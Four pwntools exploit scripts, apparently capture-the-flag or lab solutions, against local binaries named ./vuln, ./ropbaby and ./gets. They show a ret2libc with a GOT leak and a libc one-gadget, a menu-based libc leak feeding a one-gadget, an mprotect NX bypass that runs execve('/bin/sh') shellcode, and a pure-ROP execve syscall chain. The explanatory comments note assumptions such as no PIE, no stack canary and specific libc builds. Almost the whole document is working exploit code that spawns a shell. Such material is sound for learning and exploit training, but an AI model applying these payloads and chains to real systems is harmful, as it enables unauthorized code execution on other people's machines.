
exploit.py


from pwn import *

  

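# Two-stage ret2libc against ./vuln (pwntools script).
#
# Stage 1 overflows the stack buffer, returns into puts(puts@got) to leak a
# libc address, then returns to main for a second round. Stage 2 overflows
# again and returns straight into a libc one-gadget.
#
# Assumptions baked into the hard-coded values below: the binary is loaded at
# a fixed address (no PIE), there is no stack canary in front of the saved
# return address, and the one_gadget offsets match the target's exact libc
# build -- with a different libc the second stage just crashes.
#
# Byte literals (b"...") are used for everything that is sent or unpacked so
# the script runs unchanged on Python 3 pwntools; on Python 2 b"" is plain str,
# so behaviour is identical.
p = process("./vuln")

e = ELF("./vuln")
l = e.libc

# Gadget that loads the puts@got pointer into the first-argument register
# (presumably pop rdi; ret, from the name -- confirm against the binary).
pr = 0x400753
# Address of main, so the program loops for the second payload after the leak.
main_start = 0x4006A9
# Libc-relative offsets (presumably from the one_gadget tool); build-specific.
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]

# 0x40 bytes of buffer plus 8 bytes of saved rbp precede the return address
# (inferred from the padding size -- verify in a debugger if the target changes).
payload = b"A" * (0x40 + 8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(main_start)

p.sendlineafter(">> ", payload)
p.recvuntil("!!\n")

# puts() stops at the first NUL of the GOT entry; a 64-bit user-space address
# has 6 significant bytes, so pad to 8 before unpacking.
puts_addr = u64(p.recv(6).ljust(8, b"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + one_gadget[1]

# Stage 2: same overflow, return directly into the one-gadget.
payload2 = b"A" * (0x40 + 8)
payload2 += p64(one_addr)
p.sendlineafter(">> ", payload2)

p.interactive()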



exploit.py


from pwn import *

  

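# Ret2libc against ./ropbaby (pwntools script).
#
# The program's own menu is used as the info leak: option 2 resolves a libc
# symbol and prints its address, which fixes libc_base. Option 3 then accepts a
# caller-supplied ROP chain and option 4 (presumably) returns into it.
#
# The one_offset values are specific to one libc build; run against a target
# with a different libc they resolve to garbage and the process crashes.
#
# Byte literals are used for data that is sent or parsed so the script works
# on Python 3 pwntools as well; on Python 2 b'' is plain str, same behaviour.
p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc

# Libc-relative pop-rdi offset; not used by the chain below, kept for reference.
pop_rdi_offset = 0x000000000002155f
gets_offset = libc.symbols['gets']
# Libc-relative offsets (presumably from the one_gadget tool); build-specific.
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]

# Leak: ask the program for the address of gets and parse the third
# whitespace-separated field of the reply line as hex.
p.sendlineafter(': ', '2')
p.sendlineafter(': ', 'gets')
gets_addr = int(p.recvline().split(b' ')[2], 16)

libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

# Chain: 8 bytes of padding, then the gadget address.
payload = b'A' * 8
payload += p64(one_addr)

# Option 3 reads a chain of the stated length; +1 presumably accounts for the
# trailing newline that sendline appends -- confirm against the binary's reader.
p.sendlineafter(': ', '3')
p.sendlineafter(': ', str(len(payload) + 1))
p.sendline(payload)

# Option 4 triggers the chain.
p.sendlineafter(': ', '4')
p.interactive()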



mprotect_exploit.py


from pwn import *

  

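# mprotect-based NX bypass against ./gets, 32-bit (pwntools script).
#
# The ROP chain calls read(0, bss, len) to stage shellcode in .bss, then
# mprotect(bss, len, 7) to make that page executable, then jumps to it.
# It shows why NX alone is not a sufficient mitigation when mprotect is
# reachable: the fixed addresses below assume a non-PIE binary, and a stack
# canary in front of the return address would stop the overflow in stage one.
#
# Byte literals keep the shellcode and padding as raw bytes on Python 3
# (a str literal with \x31\xc0... would be re-encoded as UTF-8 and corrupted);
# on Python 2 b"" is plain str, so behaviour is unchanged.
p = process("./gets")

# Addresses inside the executable itself (fixed, so no leak is needed).
read = 0x0806D5F0
mprotect = 0x0806E0F0
# Presumably pop; pop; pop; ret -- used to discard three arguments between calls.
pppr = 0x80bacfe
# Page-aligned writable address used as the staging area for the shellcode.
bss = 0x080eb000
shellCode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

# 0x18-byte buffer plus 4 bytes of saved ebp before the return address
# (inferred from the padding size -- verify in a debugger if the target changes).
payload = b"A" * (0x18 + 4)

# read(0, bss, len(shellCode)); return address is pppr so its three cdecl
# arguments are popped off before the next call.
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))

# mprotect(bss, len(shellCode), 7) -- 7 is PROT_READ|PROT_WRITE|PROT_EXEC.
payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)

# Finally return into the now-executable staging area.
payload += p32(bss)

p.sendlineafter("\n", payload)

# Give the chain time to reach read() before supplying its input; read() only
# consumes len(shellCode) bytes, so the newline sendline appends is left over.
sleep(0.1)
p.sendline(shellCode)
p.interactive()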


syscall_exploit.py


from pwn import *

  

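# Pure-ROP execve syscall chain against ./gets, 32-bit (pwntools script).
#
# Unlike the mprotect variant this chain never executes injected code: it uses
# gets() to place "/bin/sh" in .bss, loads the i386 execve register convention
# (eax=0xb, ebx=path, ecx=argv, edx=envp) with pop gadgets, and returns into an
# int 0x80 gadget. No libc leak is needed because every address is inside the
# non-PIE executable; PIE or a stack canary would break this chain.
#
# Gadget names follow the pop-<reg>; ret convention (par = pop eax; ret, pbr =
# pop ebx; ret, ...) -- presumed from the names, confirm against the binary.
#
# Byte literals are used for data that is sent so the script runs on Python 3
# pwntools; on Python 2 b"" is plain str, so behaviour is identical.
p = process("./gets")

gets_plt = 0x804f120
# Writable scratch address that receives the "/bin/sh" string.
bss = 0x080eaf80
par = 0x080b81c6
pbr = 0x080481c9
pcr = 0x080de955
pdr = 0x0806f02a
syscall = 0x0806cc25
binsh = b"/bin/sh\x00"

# 0x18-byte buffer plus 4 bytes of saved ebp before the return address
# (inferred from the padding size -- verify in a debugger if the target changes).
payload = b"A" * (0x18 + 4)

# gets(bss): read the second line of input into .bss. The return address is
# par so the single cdecl argument is popped before the chain continues.
payload += p32(gets_plt)
payload += p32(par)
payload += p32(bss)

# eax = 0xb (SYS_execve on i386)
payload += p32(par)
payload += p32(0xb)
# ebx = pathname
payload += p32(pbr)
payload += p32(bss)
# ecx = argv = NULL
payload += p32(pcr)
payload += p32(0)
# edx = envp = NULL
payload += p32(pdr)
payload += p32(0)
# int 0x80
payload += p32(syscall)

p.sendlineafter("\n", payload)

# Give the chain time to reach gets() before supplying its input.
sleep(0.1)
p.sendline(binsh)
p.interactive()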

